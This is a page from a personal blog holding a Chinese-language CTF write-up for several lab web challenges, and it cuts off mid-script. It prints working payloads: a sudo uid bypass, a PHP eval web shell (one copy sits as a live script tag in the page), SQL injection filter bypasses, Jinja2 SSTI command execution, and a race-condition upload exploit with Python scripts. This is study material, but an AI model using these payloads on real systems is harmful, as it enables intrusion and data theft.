<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ton_andy.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="数据方面、网络安全方面的记事本">
<meta property="og:type" content="website">
<meta property="og:title" content="dong&#39;s blog">
<meta property="og:url" content="https://ton_andy.gitee.io/index.html">
<meta property="og:site_name" content="dong&#39;s blog">
<meta property="og:description" content="数据方面、网络安全方面的记事本">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="dong">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ton_andy.gitee.io/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : true,
    isPost : false,
    lang   : 'en'
  };
</script>

  <title>dong's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dong's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">兴趣使人进步</p>
      <a>
        <img class="custom-logo-image" src="/uploads/logo.png" alt="dong's blog">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content index posts-expand">
            
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/17/2021%E4%B8%80%E4%BA%9B%E7%BB%83%E4%B9%A0%E9%A2%98wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/17/2021%E4%B8%80%E4%BA%9B%E7%BB%83%E4%B9%A0%E9%A2%98wp/" class="post-title-link" itemprop="url">2021一些练习题wp</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-01-17 20:51:31 / Modified: 20:54:54" itemprop="dateCreated datePublished" datetime="2022-01-17T20:51:31+08:00">2022-01-17</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><p><img src="/.io//0081Kckwgy1gk60rvnegsj30dz06gq38.jpg" alt="屏幕快照 2020-10-29 上午10.59.13"></p>
<p><a target="_blank" rel="noopener" href="http://192.168.4.3:20001/flag.txt">http://192.168.4.3:20001/flag.txt</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this is a fake flag, real flag is in /root/flag.txt</span><br></pre></td></tr></table></figure>

<p>查看报错页面</p>
<p><img src="/.io//0081Kckwgy1gk6101orocj309m05jaac.jpg" alt="屏幕快照 2020-10-29 上午11.03.34"></p>
<p>Tomcat 7.0.79 存在任意文件上传漏洞</p>
<p><img src="/.io//0081Kckwgy1gk60zyum55j30f70ezmz6.jpg" alt="屏幕快照 2020-10-29 上午11.07.03"></p>
<p><img src="/.io//0081Kckwgy1gk6144yvmrj30e106zgmw.jpg" alt="屏幕快照 2020-10-29 上午11.10.47"></p>
<p>Payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -u#-1 cat /root/flag.txt</span><br><span class="line">flag&#123;4403677dc0a7dc9461c7a2f5afcb1ef4&#125;</span><br></pre></td></tr></table></figure>



<p>##Web2</p>
<p><img src="/.io//0081Kckwgy1gk616r3bfwj30ij05q0sy.jpg" alt="屏幕快照 2020-10-29 上午11.13.34"></p>
<p>上传马</p>
<p><img src="/.io//0081Kckwgy1gk61gc6lnmj309t01laa0.jpg" alt="屏幕快照 2020-10-29 上午11.22.20"></p>
<p>?被过滤</p>
<script language="php">eval($_POST['cmd']);</script>



<h2 id="sqlsql"><a href="#sqlsql" class="headerlink" title="sqlsql"></a>sqlsql</h2><p>地址:192.168.4.3<br>端口:20003<br>详情:sqlsql</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;source&#x27;])) &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$pattern = &#x27;/(\s|UNION|OR|=|TRUE|FALSE|&gt;|&lt;|IS|LIKE|BETWEEN|REGEXP|--|#|!|\^|;|\/|\*|\|)/i&#x27;;</span><br><span class="line">if (isset($_POST[&#x27;username&#x27;]) &amp;&amp; isset($_POST[&#x27;password&#x27;])) &#123;</span><br><span class="line"></span><br><span class="line">    if (preg_match($pattern, $_POST[&#x27;username&#x27;], $matches)) &#123;</span><br><span class="line">        var_dump($matches);</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">    if (preg_match($pattern, $_POST[&#x27;password&#x27;], $matches)) &#123;</span><br><span class="line">        var_dump($matches);</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $pdo = new PDO(&#x27;mysql:host=localhost;dbname=sqlsql;charset=utf8;&#x27;, &#x27;root&#x27;, &#x27;sqlpass&#x27;);</span><br><span class="line">    $pdo-&gt;setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);</span><br><span class="line">    $stmt = $pdo-&gt;prepare(&quot;SELECT username from users where username=&#x27;$&#123;_POST[&#x27;username&#x27;]&#125;&#x27; and password=&#x27;$&#123;_POST[&#x27;password&#x27;]&#125;&#x27;&quot;);</span><br><span class="line">    $stmt-&gt;execute();</span><br><span class="line">    $result = $stmt-&gt;fetchAll();</span><br><span class="line">    if (count($result) &gt; 0) &#123;</span><br><span class="line">        if ($result[0][&#x27;username&#x27;] == &#x27;admin&#x27;) &#123;</span><br><span class="line">            echo include(&#x27;flag.php&#x27;);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            echo &#x27;Lo .. Logining as &#x27; .  $result[0][&#x27;username&#x27;] . &#x27;!&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">    echo &#x27;Failed&#x27;;</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line">include &quot;form.php&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>绕过关键字闭合sql语句</p>
<p>万能密码 </p>
<p>payload </p>
<p>username=admin&amp;password=’-0-‘ </p>
<p>sql语句为： </p>
<p>SELECT username from users where username=’admin’ and password=’’-0-‘’</p>
<p>username=admin’and&amp;password=+’1 </p>
<p>sql语句为： </p>
<p>SELECT username from users where username=’admin’and’ and password=’+’1’</p>
<p>select ‘’-0-‘’; 值为0。当password为字符时， password=’’-0-‘’ 值为1，即为真。 </p>
<p>select ‘ and password=’+’1’;值为1。即为select * from user where username =’admin’and’1’</p>
<h2 id="web44-UnderGroundCity"><a href="#web44-UnderGroundCity" class="headerlink" title="web44  UnderGroundCity"></a>web44  UnderGroundCity</h2><p>地址:192.168.4.3<br>端口:12004<br>详情:web44</p>
<p>推荐一个能把Python代码给编译成一句话的形式工具<br>官网 <a target="_blank" rel="noopener" href="http://www.onelinerizer.com/">http://www.onelinerizer.com/</a><br>Github地址：<a target="_blank" rel="noopener" href="https://github.com/csvoss/onelinerizer">https://github.com/csvoss/onelinerizer</a></p>
<p>报错页 源码 发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;/footer&gt;</span><br><span class="line">    &lt;!-- maybe ssti help u--&gt;</span><br></pre></td></tr></table></figure>

<p>测试：</p>
<p><img src="/.io//0081Kckwgy1gk67bleec2j30lz0aygmw.jpg" alt="屏幕快照 2020-10-29 下午2.45.26"></p>
<p>确定为模板注入</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__</span><br><span class="line">&quot;&quot;.__class__.__bases__  # 返回(&lt;class &#x27;object&#x27;&gt;,)</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()# 找到os._wrap_close 查index</span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__mro__[1].__subclasses__()&#125;&#125; # 找到os._wrap_close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44]&#125;&#125; # os._wrap_close</span><br><span class="line"></span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44].__init__.__globals__[&#x27;popen&#x27;](&#x27;ls&#x27;).read()&#125;&#125;  # 执行ls</span><br><span class="line"># themes web.py</span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44].__init__.__globals__[&#x27;popen&#x27;](&#x27;cat web.py&#x27;).read()&#125;&#125;  # 执行cat</span><br><span class="line">出错，在看index</span><br><span class="line"></span><br><span class="line">找到flag</span><br><span class="line">flag&#123;vlun_ssti_to_s3cret&#125;</span><br></pre></td></tr></table></figure>

<p>Way2 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[&#x27;current_app&#x27;].config&#125;&#125;</span><br><span class="line">&#123;&#123;url_for.__globals__[&#x27;curr&#x27;+&#x27;ent_app&#x27;].config&#125;&#125;  # 读取config</span><br><span class="line"># &#x27;SECRET_KEY&#x27;: &#x27;flag&#123;FakeFlagAndTryToVisit/admin&#125;&#x27;,</span><br><span class="line"># 根据提示，需要访问/admin</span><br><span class="line">需要构造cookie</span><br><span class="line"></span><br><span class="line">解密:python flask_session_manager.py decode -s SECRET_KEY -c session</span><br><span class="line">加密:python flask_session_manager.py encode -s SECRET_KEY -t 未加密session</span><br></pre></td></tr></table></figure>

<p>抓包提交得flag</p>
<p>##Simple_SQLi</p>
<p>地址:192.168.4.3<br>端口:20005<br>详情:Simple_SQLi</p>
<p>回显IP，考虑到xff注入</p>
<p>X-Forwarded-For: 127.0.0.2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: 0.0.0.0&#x27;</span><br><span class="line">得到</span><br><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#x27;&#x27;0.0.0.0&#x27;&#x27;)&#x27; at line 1</span><br><span class="line"></span><br><span class="line">发现报错回显，使用报错注入</span><br><span class="line">&#x27;or extractvalue(1,(select concat(0x7e,(select user()))))#</span><br><span class="line">回显：near &#x27;extractvalue(1,( concat(0x7e,( user()))))#&#x27;)&#x27; at line 1</span><br><span class="line">过滤了 or select</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user())))#</span><br><span class="line">无法显示，报错，</span><br><span class="line">加) 右括号</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user()))))#</span><br><span class="line"></span><br><span class="line">payload</span><br><span class="line"></span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user()))))#</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect database()))))#</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(schema_name)from(infoorrmation_schema.schemata)  )))#</span><br><span class="line">XPATH syntax error: &#x27;~Xff_1s_fuNny,information_schema&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(table_name)from(infoorrmation_schema.tables)where table_schema=&quot;Xff_1s_fuNny&quot;  ))))#</span><br><span class="line">XPATH syntax error: &#x27;~Store,flag,t_session,ALL_PLUGIN&#x27;</span><br><span class="line"></span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(column_name)from(infoorrmation_schema.columns) where table_name=&quot;flag&quot; ))))#</span><br><span class="line">无回显</span><br><span class="line">flag 双写解决</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(column_name)from(infoorrmation_schema.columns) where table_name=&quot;flflagag&quot; ))))#</span><br><span class="line">XPATH syntax error: &#x27;~flag&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect substring(group_concat(flflagag),1,32)from flflagag ))))#</span><br><span class="line">XPATH syntax error: &#x27;~flag&#123;14e1b600b1fd579f47433b88e8&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect substring(group_concat(flflagag),32,64)from flflagag ))))#</span><br><span class="line">XPATH syntax error: &#x27;~d85291&#125;&#x27;</span><br></pre></td></tr></table></figure>



<h2 id="web6-upppppppload"><a href="#web6-upppppppload" class="headerlink" title="web6  upppppppload"></a>web6  upppppppload</h2><p>地址:192.168.4.3<br>端口:20006<br>详情:upppppppload</p>
<p>考点： 代码审计+条件竞争 +两个文件上传</p>
<p>1.御剑扫描得到index.php.txt源码和flag.php </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$name</span> = <span class="string">&#x27;upload_&#x27;</span>.rand(<span class="number">10</span>,<span class="number">15</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$ext</span>;<span class="comment">#随机生成10‐15的文件名形如upload_10.jpg</span></span><br><span class="line"><span class="variable">$upload</span> = <span class="keyword">new</span> file_upload(<span class="variable">$_FILES</span>,<span class="string">&#x27;./uploads/&#x27;</span>,<span class="variable">$name</span>,<span class="string">&#x27;jpg|jpeg|gif|png&#x27;</span>);<span class="comment">#生成file_upload的对象</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_file</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;  <span class="comment"># foreach（漏洞利用点）</span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;file = <span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>];<span class="comment">#临时文件名 </span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;file_name = <span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>];<span class="comment">#文件名 默认为表单里设置的myfile </span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;file_size = <span class="variable">$file</span>[<span class="string">&#x27;size&#x27;</span>];<span class="comment">#文件大小 </span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;file_type = <span class="variable">$file</span>[<span class="string">&#x27;type&#x27;</span>];<span class="comment">#文件类型 </span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;file_error = <span class="variable">$file</span>[<span class="string">&#x27;error&#x27;</span>];<span class="comment">#文件错误 </span></span><br><span class="line"><span class="keyword">$this</span>‐&gt;ext = get_file_ext(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]);<span class="comment">#获取上传的文件名后缀</span></span><br><span class="line"><span class="comment"># 校验和检查的后缀名是最后一个上传的文件名</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#move_uploaded_file函数保存文件。sleep延迟0.1后对当前目录下文件的后缀名进行校验。</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save_file</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;check_ext_is_allow()===<span class="literal">false</span>)</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;jpg|jpeg|gif|png&quot;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span>(!is_writable(<span class="keyword">$this</span>-&gt;savepath)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!is_uploaded_file(<span class="keyword">$this</span>-&gt;file)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!move_uploaded_file(<span class="keyword">$this</span>-&gt;file,<span class="keyword">$this</span>-&gt;savepath.<span class="keyword">$this</span>-&gt;savename)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span> (<span class="keyword">$this</span>-&gt;savename);</span><br><span class="line">    sleep(<span class="number">0.1</span>);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;file_unsafe_check(<span class="keyword">$this</span>-&gt;savepath);</span><br><span class="line">  &#125;   	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>构造两个文件上传。第一个文件后缀名是php，第二个文件后缀名是jpg。然后利用条件竞争去访问生成的php文件执行命令。</strong> </p>
<p>Way1,使用burp发送payload,python 读</p>
<p>Burp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐3683218435460675451276712263</span><br><span class="line">Content‐Disposition: form‐data; name=&quot;myfile&quot;; filename=&quot;config.php&quot; </span><br><span class="line">Content‐Type: application/octet‐stream </span><br><span class="line">&lt;?php eval(system(&#x27;cat flag.php&#x27;)); ?&gt; </span><br><span class="line">‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐36832184354606754512767122635</span><br><span class="line">‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐3683218435460675451276712263</span><br><span class="line">Content‐Disposition: form‐data; name=&quot;myfile2&quot;; filename=&quot;config.jpg&quot; </span><br><span class="line">Content‐Type: application/octet‐stream </span><br><span class="line">&lt;?php eval(system(&#x27;cat flag.php&#x27;)); ?&gt; </span><br><span class="line">‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐36832184354606754512767122635‐‐</span><br></pre></td></tr></table></figure>

<p>python</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">sign = <span class="number">0</span> </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>: </span><br><span class="line">    <span class="keyword">try</span>: </span><br><span class="line">        <span class="keyword">if</span> sign == <span class="number">0</span>: </span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>, <span class="number">16</span>): </span><br><span class="line">            url = <span class="string">&quot;http://192.168.4.3:20006/uploads/upload_&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;.php&quot;</span> </span><br><span class="line">            <span class="comment"># print url </span></span><br><span class="line">            response = requests.get(url) </span><br><span class="line">            code =response.status_code </span><br><span class="line">            content = response.content </span><br><span class="line">        <span class="keyword">if</span> code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">&#x27;flag&#x27;</span> <span class="keyword">in</span> content : </span><br><span class="line">            <span class="built_in">print</span> content </span><br><span class="line">            sign =<span class="number">1</span> </span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>: </span><br><span class="line">            <span class="keyword">break</span> </span><br><span class="line">    <span class="keyword">except</span>: </span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;err&quot;</span></span><br></pre></td></tr></table></figure>

<p>第二种方式是开两个进程，一个上传文件，一个不停访问。一步到位读到flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line"><span class="keyword">import</span> re </span><br><span class="line"><span class="keyword">from</span> multiprocessing <span class="keyword">import</span> Process </span><br><span class="line">base_url = <span class="string">&quot;http://192.168.4.3:20006/&quot;</span> </span><br><span class="line"><span class="comment">#通过data上传两个文件 </span></span><br><span class="line">data = &#123; </span><br><span class="line"><span class="string">&#x27;myfile&#x27;</span>:(<span class="string">&#x27;first.php&#x27;</span>,<span class="string">&quot;&lt;?php echo &#x27;hello&#x27;?&gt;&quot;</span>), </span><br><span class="line"><span class="string">&#x27;lastfile&#x27;</span>:(<span class="string">&#x27;last.jpg&#x27;</span>,<span class="string">&quot;&lt;?php system(&#x27;cat ../flag.php&#x27;); ?&gt;&quot;</span>), </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">file_upload</span>():</span> </span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;file_upload is running &#x27;</span>) </span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>: </span><br><span class="line">      resp = requests.post(base_url,files=data,timeout=<span class="number">10</span>)  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd_exp</span>():</span> </span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;cmd_exp is running &#x27;</span>) </span><br><span class="line">    sign = <span class="number">0</span> </span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>: </span><br><span class="line">        <span class="keyword">try</span>: </span><br><span class="line">            <span class="keyword">if</span> sign == <span class="number">0</span>: </span><br><span class="line">                <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>, <span class="number">16</span>): </span><br><span class="line">                    url = <span class="string">&quot;http://192.168.4.3:20006/uploads/upload_&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;.php&quot;</span> </span><br><span class="line">                    response = 